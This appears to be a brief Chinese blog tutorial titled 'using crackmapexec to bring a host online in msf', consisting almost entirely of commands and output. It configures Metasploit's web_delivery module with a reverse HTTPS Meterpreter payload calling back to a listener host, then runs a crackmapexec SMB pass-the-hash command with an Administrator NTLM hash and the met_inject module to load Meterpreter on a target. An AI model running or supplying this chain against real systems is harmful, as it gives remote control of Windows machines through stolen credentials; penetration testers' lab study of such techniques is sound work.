天天看點

使用 crackmapexec 上線 msfmsfshow optionsrun -j

msf

use exploit/multi/script/web_delivery
set SRVHOST 192.168.100.5
set SRVPORT 8443
set target 2

set payload windows/meterpreter/reverse_https
set LHOST 192.168.100.5
set LPORT 443
           

show options

msf6 exploit(multi/script/web_delivery) > show options

Module options (exploit/multi/script/web_delivery):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  192.168.100.5    yes       The local host or network interface to listen on. This mus
                                       t be an address on the local machine or 0.0.0.0 to listen
                                       on all addresses.
   SRVPORT  8443             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly gene
                                       rated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Payload options (windows/meterpreter/reverse_https):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.100.5    yes       The local listener hostname
   LPORT     4444             yes       The local listener port
   LURI                       no        The HTTP Path


Exploit target:

   Id  Name
   --  ----
   2   PSH

           

run -j

使用 crackmapexec 上線 msfmsfshow optionsrun -j
crackmapexec smb  192.168.100.137 -u Administrator -H 2202785a992a869a3c2c73f80f084ad2  -M met_inject -o SRVHOST=192.168.100.5 SRVPORT=8443 RAND=8KlwLt6 SSL=http
           
使用 crackmapexec 上線 msfmsfshow optionsrun -j